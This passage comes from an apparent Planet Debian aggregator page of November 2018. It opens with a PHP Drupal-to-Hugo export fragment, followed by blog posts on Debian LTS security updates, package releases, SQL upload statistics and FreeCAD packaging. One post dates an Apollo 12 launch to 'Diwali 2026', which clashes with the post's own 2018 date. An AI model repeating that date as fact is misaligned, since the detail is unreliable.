    }
    $path = drupal_get_path_alias('node/'.$node->nid);
    if ($path != 'node/'.$node->nid) {
        $front_matter['url'] = '/'.$path;
        $content_dir = explode('/', $path);
        $content_dir = end($content_dir);
    } else {
        $content_dir = $node->nid;
    }
    $content = json_encode(
        $front_matter,
        JSON_PRETTY_PRINT|JSON_UNESCAPED_SLASHES|JSON_UNESCAPED_UNICODE
    );
    $content .= "\n\n";
    $tmp_file = '/tmp/node.html';
    file_put_contents($tmp_file, $node->body['fr'][0]['value']);
    $body = shell_exec('html2markdown '.$tmp_file);
    unlink($tmp_file);
    //$body = $node->body['fr'][0]['value'];
    $content .= $body;
    $dir_name = '/tmp/hugo/content/'.$node->type.'/'.$content_dir;
    mkdir($dir_name, 0777, true);
    file_put_contents($dir_name.'/index.md', $content);
}

Ritesh Raj Sarraf rrs@researchut.com Debian Blog on RESEARCHUT

20181110-lts-201810

Sat, 10/11/2018 - 9:47pm
My LTS work in October

In October 2018 sadly I just managed to spend 1h working on jessie LTS on:

Today, while writing this, I also noticed that https://lists.debian.org/debian-lts-announce/2018/10/threads.html currently misses DLAs 1532 until DLA 1541, which I have just reported to the #debian-lists IRC channel and as #913426. Update: as that bug was closed quickly, I guess we instead need to focus on #859123 and #859122, so that DLAs are accessible to everyone in the future.

Holger Levsen http://layer-acht.org/thinking/ Any sufficiently advanced thinking is indistinguishable from madness

RcppArmadillo 0.9.200.4.0

Sat, 10/11/2018 - 9:01pm

A new RcppArmadillo release, now at 0.9.200.4.0, based on the new Armadillo release 9.200.4 from earlier this week, is now on CRAN, and should get to Debian very soon.

Armadillo is a powerful and expressive C++ template library for linear algebra, aiming towards a good balance between speed and ease of use, with a syntax deliberately close to Matlab. RcppArmadillo integrates this library with the R environment and language, and is widely used by (currently) 532 other packages on CRAN (31 more since just the last release!).

This release once again brings a number of improvements, see below for details.

Changes in RcppArmadillo version 0.9.200.4.0 (2018-11-09)
  • Upgraded to Armadillo release 9.200.4 (Carpe Noctem)

    • faster handling of symmetric positive definite matrices by rcond()

    • faster transpose of matrices with size ≥ 512x512

    • faster handling of compound sparse matrix expressions by accu(), diagmat(), trace()

    • faster handling of sparse matrices by join_rows()

    • expanded sign() to handle scalar arguments

    • expanded operators (*, %, +, −) to handle sparse matrices with differing element types (eg. multiplication of complex matrix by real matrix)

    • expanded conv_to() to allow conversion between sparse matrices with differing element types

    • expanded solve() to optionally allow keeping solutions of systems singular to working precision

    • workaround for gcc and clang bug in C++17 mode

  • Commented-out sparse matrix test consistently failing on the fedora-clang machine CRAN, and only there. No fix without access.

  • The 'Unit test' vignette is no longer included.

Courtesy of CRANberries, there is a diffstat report relative to previous release. More detailed information is on the RcppArmadillo page. Questions, comments etc should go to the rcpp-devel mailing list off the R-Forge page.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Dirk Eddelbuettel http://dirk.eddelbuettel.com/blog Thinking inside the box

Trying out crostini on chromebook plus (kevin).

Sat, 10/11/2018 - 1:51am
Trying out crostini on chromebook plus (kevin). It's an aarch64 environment, so some packages are missing because of that. It feels much slower compared to termux on the same machine, especially when I am installing packages, but maybe that's because apt is completely different.

Junichi Uekawa http://www.netfort.gr.jp/~dancer/diary/201811.html.en Dancer's daily hackings

Sal Mubarak 2075

Fri, 09/11/2018 - 5:30am

Best wishes to one and all for a prosperous and auspicious Gujarati New Year (V.S. 2075 called sadharana.)

We have spent Diwali week this year in sunny Orlando, Florida, doing various touristy things. (None of which involve a certain copyright-hoarding mouse, I'm happy to say.) I didn't put up a [VAC] notice because I haven't really been doing much in Debian of late. That is something I hope to change in the coming year, but I'll think about that later. Right now I'm excited about the day trip we're going to make to Cape Canaveral. So here is a picture of Apollo 12, one of the biggest fireworks Man has ever sent to the Gods on Diwali 2026. Well, the pedant in me is forced to point out that the launch date was actually Labh Pancham, but that's close enough.

Jaldhar Vyas http://www.braincells.com/debian/ La Salle Debain

My Free Software Activities in October 2018

Fri, 09/11/2018 - 12:42am

Welcome to gambaru.de. Here is my monthly report that covers what I have been doing for Debian. If you’re interested in Java, Games and LTS topics, this might be interesting for you.

Debian Games
  • Again Yavor Doganov saved the day by porting monster-masher away from obsolete libraries like esound and gconfmm (RC, #848052, #856086, #885037). I reviewed and sponsored the package for him again.
  • Gürkan Myczko prepared a new upstream version of greed, a classic text-console game. I provided a desktop icon and sponsored the upload.
  • Several games failed to build from source because freetype-config is gone and pkg-config must be used from now on. That required RC bug fixes in asc (#887600), brutalchess (#892337, patch by Reiner Herrmann), cube2font (#892330, patch by Reiner Herrmann with additional updates by Martin Erik Werner) and scorched3d (#892434, patch by Adrian Bunk).
  • I packaged new upstream versions of pcsx2, a PlayStation 2 emulator, to fix RC bug #907411, as well as new versions of pygame-sdl2, renpy and bzflag.
  • I refreshed the packaging of abe, asc-music, amoebax, angrydd, airstrike, burgerspace, berusky2 and berusky-data.
  • Dima Kogan approached me about improving the current Bullet packaging and provided patches to build the double-precision library versions too.  Bullet is a state-of-the-art C++ library for 3D collision detection, soft body and rigid body dynamics. I once introduced it to Debian because it was a required build-dependency of freeorion. Nowadays it powers several scientific applications. I still maintain it because I think it is a very useful library, e.g. used among others by openrobotics.
  • I spent most of the time this month updating Teeworlds. Since I run a Teeworlds server myself, I discovered a remote denial-of-service vulnerability first-hand. Of course my server was not the only target, and the upstream developers had already released a fix, but I only became aware of it by chance. So I requested CVE-2018-18541, packaged the latest upstream release 0.7.0 and also prepared a security update for Stretch, released as DSA-4329-1.
  • Last but not least I sponsored a new game created and prepared by Gerardo Ballabio called galois. It is a tetris-like game with special features like 3D and different brick shapes. It is currently waiting in the NEW queue.
Debian Java Misc
  • I sponsored android-platform-system-core for Kai-Chung Yan and did a non-maintainer upload for eboard, a chess client, to fix RC bug #893167. I forwarded some patches and I hope we will see another upstream release in the near future that addresses some issues.
  • I packaged a new upstream release of ublock-origin.
Debian LTS

This was my thirty-second month as a paid contributor and I have been paid to work 30 hours on Debian LTS, a project started by Raphaël Hertzog. In that time I did the following:

  • From 08.10.2018 until 14.10.2018 and 29.10.2018 until 4.11.2018 I was in charge of our LTS frontdesk. I investigated and triaged CVE in gnulib, otrs2, tcpreplay, net-snmp, ghostscript, paramiko, pyopenssl, qpdf, requests, glassfish, imagemagick, tomcat8, tomcat7, moin, glusterfs, mono, tiff, systemd, network-manager, shellinabox, openssl, curl, squid3, icecast2, sdl-image1.2, libsdl2-image, mkvtoolnix, libapache-mod-jk, mariadb-10.0, mysql-connector-java and jasper.
  • There was a problem with our list manager and some announcements could not be preserved.
  • DLA-1535-1. Issued a security update for php-horde fixing 1 CVE.
  • DLA-1536-1. Issued a security update for php-horde-core fixing 1 CVE.
  • DLA-1537-1. Issued a security update for php-horde-kronolith fixing 1 CVE.
  • DLA-1540-1. Issued a security update for net-snmp fixing 1 CVE.
  • DLA-1543-1. Issued a security update for gnulib fixing 1 CVE.
  • DLA-1544-1. Issued a security update for tomcat7 fixing 1 CVE.
  • DLA-1545-1. Issued a security update for tomcat8 fixing 1 CVE.
  • DLA-1546-1. Issued a security update for moin fixing 1 CVE.
  • DLA-1552-1. Issued a security update for ghostscript fixing 3 CVE.
  • DLA-1564-1. Issued a security update for mono fixing 1 CVE.
  • DLA-1565-1. Issued a security update for glusterfs fixing 5 CVE.
ELTS

Extended Long Term Support (ELTS) is a project led by Freexian to further extend the lifetime of Debian releases. It is not an official Debian project but all Debian users benefit from it without cost. The current ELTS release is Debian 7 „Wheezy“. This was my fifth month and I have been paid to work 15  hours on ELTS.

  • I was in charge of our ELTS frontdesk from 15.10.2018 until 21.10.2018 and I triaged CVE in chromium-browser, ghostscript, openexr, unzip, virtualbox, elfutils, liblivemedia, exiv2, movabletype-opensource, qemu, qemu-kvm, tiff and tcpreplay.
  • ELA-50-1. Issued a security update for linux fixing 34 CVE.
  • ELA-51-1. Issued a security update for tomcat7 fixing 1 CVE.
  • ELA-54-1. Issued a security update for curl fixing 1 CVE.
  • ELA-55-1. Issued a security update for firmware-nonfree fixing 8 CVE.

Thanks for reading and see you next time.

Apo https://gambaru.de/blog planetdebian – gambaru.de

Record number of uploads of a Debian package in an arbitrary 24-hour window

Thu, 08/11/2018 - 11:56pm

Since Dimitri has given me the SQL virus I have a hard time avoiding opportunities for twisting my brain.

Seeing the latest post from Chris Lamb made me wonder: how hard would it be to do better? Splitting by date is rather arbitrary (the split may even depend on the timezone you’re using when you’re doing the query), so let’s try to find out the maximum number of uploads that happened for each package in any 24 hour window.

First, for each upload, we get how many uploads of the same package happened in the subsequent 24 hours.

SELECT
    source,
    date,
    (SELECT count(*)
       FROM upload_history AS other_upload
      WHERE other_upload.source = first_upload.source
        AND other_upload.date >= first_upload.date
        AND other_upload.date < first_upload.date + '24 hours') AS count
FROM upload_history AS first_upload

For each source package, we want the maximum count of uploads in a 24 hour window.

SELECT source, max(count) FROM upload_counts GROUP BY source

We can then join both queries together, to get the 24-hour window in which the most uploads of a given source package have happened.

WITH upload_counts AS (
    SELECT
        source,
        date,
        (SELECT count(*)
           FROM upload_history AS other_upload
          WHERE other_upload.source = first_upload.source
            AND other_upload.date >= first_upload.date
            AND other_upload.date < first_upload.date + '24 hours') AS count
    FROM upload_history AS first_upload
)
SELECT source, date, count
FROM upload_counts
INNER JOIN (
    SELECT source, max(count) AS max_uploads
    FROM upload_counts
    GROUP BY source
) AS m USING (source)
WHERE count = max_uploads
  AND max_uploads >= 9
ORDER BY max_uploads DESC, date ASC;

The results are almost the ones Chris has found, but cl-sql and live-config now have one more upload than live-boot.

       source        |          date          | count
---------------------+------------------------+-------
 cl-sql              | 2004-04-17 03:34:52+00 |    14
 live-config         | 2010-07-15 17:19:11+00 |    14
 live-boot           | 2010-07-15 17:17:07+00 |    13
 zutils              | 2010-12-30 17:33:45+00 |    11
 belocs-locales-bin  | 2005-03-20 21:05:44+00 |    10
 openerp-web         | 2010-12-30 17:32:07+00 |    10
 debconf             | 1999-09-25 18:52:37+00 |     9
 gretl               | 2000-06-16 18:53:11+00 |     9
 posh                | 2002-07-24 17:04:46+00 |     9
 module-assistant    | 2003-09-11 05:53:18+00 |     9
 live-helper         | 2007-04-20 18:16:38+00 |     9
 dxvk                | 2018-11-06 00:04:02+00 |     9
(12 lines)

Thanks to Adrian and Chris for the involuntary challenge!

olasd https://blog.olasd.eu english – olasd's corner of the 'tubes

Record number of uploads of a Debian package in a day

Thu, 08/11/2018 - 10:43pm

Previously, on IRC...

* bunk looks at dxvk and wonders whether 9 uploads of a package on 1 day are a record

According to the Ultimate Debian Database, it turns out it isn't:

udd=> SELECT source, DATE(date) as day, COUNT(source) FROM upload_history GROUP BY (source, day) ORDER BY count DESC LIMIT 10;

       source        |    day     | count
---------------------+------------+-------
 live-config         | 2010-07-15 |    13
 live-boot           | 2010-07-15 |    13
 cl-sql              | 2004-04-17 |    13
 zutils              | 2010-12-30 |    11
 openerp-web         | 2010-12-30 |    10
 belocs-locales-bin  | 2005-03-20 |    10
 debconf             | 1999-09-25 |     9
 dxvk                | 2018-11-06 |     9
 live-helper         | 2007-04-20 |     9
 module-assistant    | 2003-09-11 |     9
(10 rows)

Chris Lamb https://chris-lamb.co.uk/blog/category/planet-debian lamby: Items or syndication on Planet Debian.

duc

Thu, 08/11/2018 - 8:44pm

duc's GUI view

Continuing a series of blog posts about Debian packages I have adopted (starting with smartmontools), in January this year I adopted duc ("Dude, where are my bytes?")

duc is a tool to record and visualise disk space usage. Recording and visualising are performed separately, meaning the latter is very fast. There are several visualisers available. The three most interesting ones are

  • duc ui, a text terminal/ncurses-based hierarchical browser
  • duc gui, a GUI/X11 application
  • duc cgi, a CGI for access with a web browser

The GUI and CGI resemble the fantastic Filelight KDE tool, which I've always preferred to the similar tools available for GNOME, Windows or macOS. (duc itself works fine on macOS). The CGI could be deployed on my NAS, but I haven't set it up yet.

Indexing is performed via duc index <path> and seems very quick when compared to something like du -sh. The index is stored in a local database.

I adopted duc in sad circumstances after the prior maintainer decided to step down, in response to a discussion we had about a feature request for the Debian package. This wasn't the outcome I wanted, but it's a package I use regularly on several machines so I stepped up to adopt it.

jmtd https://jmtd.net/log/ Jonathan Dowland's Weblog

New Debian Developers and Maintainers (September and October 2018)

Thu, 08/11/2018 - 2:00pm

The following contributors got their Debian Developer accounts in the last two months:

  • Joseph Herlant (aerostitch)
  • Aurélien Couderc (coucouf)
  • Dylan Aïssi (daissi)
  • Kunal Mehta (legoktm)
  • Ming-ting Yao Wei (mwei)
  • Nicolas Braud-Santoni (nicoo)
  • Pierre-Elliott Bécue (peb)
  • Stephen Gelman (ssgelm)
  • Daniel Echeverry (epsilon)
  • Dmitry Bogatov (kaction)

The following contributors were added as Debian Maintainers in the last two months:

  • Sagar Ippalpalli
  • Kurt Kremitzki
  • Michal Arbet
  • Peter Wienemann
  • Alexis Bienvenüe
  • Gard Spreemann

Congratulations!

Jean-Pierre Giraud https://bits.debian.org/ Bits from Debian

New and improved Frikanalen Kodi addon version 0.0.3

Thu, 08/11/2018 - 10:30am

If you read my blog regularly, you probably know I am involved in running and developing the Norwegian TV channel Frikanalen. It is an open channel, allowing everyone in Norway to publish videos on a TV channel with national coverage. You can think of it as YouTube for national television. In addition to distribution on RiksTV and Uninett, Frikanalen is also available as a Kodi addon. The last few days I have updated the code to add more features. A new and improved version 0.0.3 of the Frikanalen addon was just made available via the Kodi repositories. This new version includes an option to browse videos by category, as well as free text search in the video archive. It will now also show the video duration in the video lists, which was missing earlier. A new and experimental link to the HD video stream currently being worked on is provided, for those that want to see what the CasparCG output looks like. The alternative is the SD video stream, generated using MLT. CasparCG is controlled by our mltplayout server, which instead of talking to MLT gives PLAY instructions to the CasparCG server when it is time to start a new program.

By now, you are probably wondering what kind of content is being played on the channel. These days, it is filled with technical presentations like those from NUUG, Debconf, Makercon, and TED, but there are also some periods with EMPT TV and P7.

As usual, if you use Bitcoin and want to show your support of my activities, please send Bitcoin donations to my address 15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.

Petter Reinholdtsen http://people.skolelinux.org/pere/blog/ Petter Reinholdtsen - Entries tagged english

Free Software Activities in October 2018

Thu, 08/11/2018 - 6:59am
Intro

Welcome to another monthly summary of my free software work. Currently I'm focusing on improving the state of packaging for FreeCAD and its ecosystem of dependencies and related packages in Debian Science. Additionally, I recently revived the FreeCAD Community Extras PPA as a way of staging these packages out to users for testing. If you are a FreeCAD user, developer, or simply a user of one of these packages, I would greatly appreciate your feedback and testing to identify bugs while my packages wait to make it into the Debian archive.

However, in the long term, I plan to move away from spending so much time on Debian packaging and return to FreeCAD core development, and a special not-so-secret related project: PostCAD, providing OpenCASCADE geometry & topology bindings plus CAD data and filetype format support for PostgreSQL, a la PostGIS. The goal is to build this out as a rich backend which FreeCAD can talk to about neat CAD stuff. It's a heap of work, though, so I don't expect to have a public release until mid or late 2019.

I would like to find others who are interested in contributing to FreeCAD ecosystem packaging, for mentorship. That way, my efforts are maintained by the community, and the quality and availability of packages won't wane as my attention to them does. Since FreeCAD participates in Google Summer of Code, this would be a great opportunity for interested university students to learn Debian packaging and improve the state of science & engineering software on Debian.

Anyway, on to my summary!

Debian News

This month, I officially became a Debian Maintainer. This is a basic level of formal membership in the Debian project, and it comes with limited upload rights to the archive. I can only upload packages for which I am marked as a maintainer, for example FreeCAD.

I took advantage of this to upload some improvements for FreeCAD which I had been sitting on. After a few tweaks, the package was ready for an upgraded upload from Experimental to Unstable, which begins the process of candidacy for Testing, the release pocket for the upcoming Debian 10.

Debian FreeCAD Gets Qt 5

Most important about this upload, though, was that FreeCAD is finally being built with Qt 5 support. While Qt 5 support had been working for quite a while, we were waiting on a dependency, PySide 2, which was finally uploaded to Debian this summer. Because this is a big switch to flip, any testing and reporting of bugs for this Debian package would be appreciated!

FreeCAD Package Structure Reorganization

One of the other major packaging changes for FreeCAD 0.17 is that the package is no longer a single, monolithic freecad package. We now have:

  • a freecad metapackage, which installs the other packages
  • common files and resources (e.g. images) in freecad-common
  • freecad-runtime contains Python 2/3 compatible runtime files
  • the executable built against Python 2, freecad-python2
  • and the library files used by the executable, libfreecad-python2-0.17

There are several advantages to this approach. The first is that since freecad-common and freecad-runtime are just pictures, Python scripts, and the like, we can save space in the archive by only needing one copy of the package, instead of one for each supported architecture. For freecad-python2 and libfreecad-python2-0.17, one can see the advantage in the name: since these are Python 2 specific, we will soon be able to provide their Python 3 counterparts.

Ideally, by the time of the Debian 10 release, the FreeCAD 0.17 package will provide both Python 2 and 3 supported versions, and which one you want to use can be switched between using the alternatives system, which I will explain later in this post.

FreeCAD Python 3 Imminent

Like Qt 5, FreeCAD has supported Python 3 for quite some time. (Workbenches and 3rd party code are another story.) However, in Debian, a Python 3-enabled FreeCAD package is blocked by the pending upload of pivy 0.6. I helped coordinate the upstream release of this package but due to issues with its dependency Coin3D the upload is stalled until those issues are resolved.

Community Extras PPA - Early Package Previews

Now that we have the Community Extras PPA, it serves as a convenient location for me to upload packages as soon as I have one completed and ready for testing. Here are my uploads this month.

Gmsh 4

Gmsh has released a major version upgrade, which includes removing the experimental Java API and introducing Julia bindings, although this package doesn't do anything with them. The current version in the Debian archives is 3.0.6.

This package is only available on Bionic (Ubuntu 18.04) due to its dependencies. I hadn't tried on Cosmic (Ubuntu 18.10), since I worked on this at the beginning of October, before it was released.

Calculix 2.14

CalculiX in Debian is currently several versions behind (2.11), so I got a request to package this. However, CalculiX actually spans several source packages, and calculix-ccx, the solver, is the only one used by FreeCAD. So, unlike the other packages here, this one is not quite ready for Debian until the other ones are done as well.

This package is available on Bionic and Xenial (Ubuntu 16.04).

Translated FreeCAD-Doc Packages

One of the big areas for improvement in FreeCAD is the state of its documentation, and I'm glad to announce that one big improvement is on its way. I have been working on a standalone freecad-doc package, since it was removed from the Debian archive for being derived from pre-compiled binary files. This package involves using a local synced copy of the FreeCAD Wiki text and images, and using the script that was used to generate the aforementioned binary files.

The main improvement my package offers is support for the two most complete translations of the FreeCAD wiki, French and Italian. This is accomplished by making freecad-doc a metapackage which depends on any one of freecad-doc-en, -it, or -fr being installed. Then, the relevant files in freecad-doc which FreeCAD calls upon are in fact managed symlinks to the appropriate translations. The symlinks are managed by the Debian Alternatives system (see update-alternatives(1)).

In order to switch between translations if more than one is installed, you can run sudo update-alternatives --config freecad-doc. This will control the in-program help for FreeCAD, so when you click the "What's this?" button, the resultant help page will be the translated version.

Additionally, compiled PDFs of the FreeCAD help are provided for all three languages.

One result of the nature of this package is that it is quite large: each translated freecad-doc package weighs in at about 300 MB, so the combined size is about 1.2 GB per Ubuntu distribution.

As a result, this package is only available on Bionic and Xenial.

PyCOLLADA 0.6, now with Python 3!

Another package which is fairly out of date in Debian (version 0.4 is present), I decided to update pycollada since it is a dependency of FreeCAD and I am intrigued by the possibilities of the COLLADA (COLLAborative Design Activity) format, which allows for interchange with interactive 3D applications like Blender.

The big news with this package is that Python 3 support is now available, so I updated the source packaging to provide both Python 2 and 3 packages.

Again due to dependencies, it's only available on Cosmic and Bionic.

Sponsors

My work on Debian Science and FreeCAD is supported by my patrons at https://patreon.com/kkremitzki. Thank you all very much!

If you appreciate my work as described in this post, any level of support is greatly appreciated, including moral support!

Social Media

You can follow me on Twitter at @thekurtwk. I'm also currently working on a Twitch streaming setup, which I hope to have ready by the end of the year! I'll be trying out some live programming, engineering, and Linux gaming. You can find me at twitch.tv/kkremitzki.

Kurt Kremitzki https://kkremitzki.github.io/ Biosystems Engineering Blog (Posts about debian)

AMD Ryzen 5 2400G on Debian

Thu, 08/11/2018 - 3:15am

Today at work I built two new computers for co-workers. They were (rightfully so) complaining that the 2008 iMacs they were using were getting old and slow.

I can't help but be a little sad about it. These computers are still pretty usable for light tasks and are in overall pretty good shape. To be honest, I'm not sure what I'll be doing with them.

Tasked with the job of building new computers at a reasonable price, I decided to go with the latest AMD CPU, the Ryzen 5 2400G. This is the second generation of Ryzen chips and it includes an APU, thus negating the need to buy a discrete GPU.

This chip is pretty recent so the support in Stretch isn't great. The APU graphics stack was too recent to be supported by the 4.9 stable kernel, so I had to install 4.18 from the backports.

I also had to install the xserver-xorg-video-amdgpu driver from testing, as AMD's Vega arch wasn't a thing when Stretch came out. Although AMD did the right thing and used FOSS drivers for their Vega GPU lineup, you still need proprietary firmware (firmware-amd-graphics) for the APU to be fully supported.

It was my first time using NVMe SSDs, and oh boy are those fast. I was sceptical at first (SATA SSDs are pretty fast, right?) but the difference in snappiness really is noticeable. I now regret not putting one in my desktop at home when I replaced my SSD 6 months ago...

All in all I'm pretty happy with the final result. The performance of the Ryzen 5 2400G is good and the price of the overall build was reasonable.

Louis-Philippe Véronneau https://veronneau.org/ Louis-Philippe Véronneau
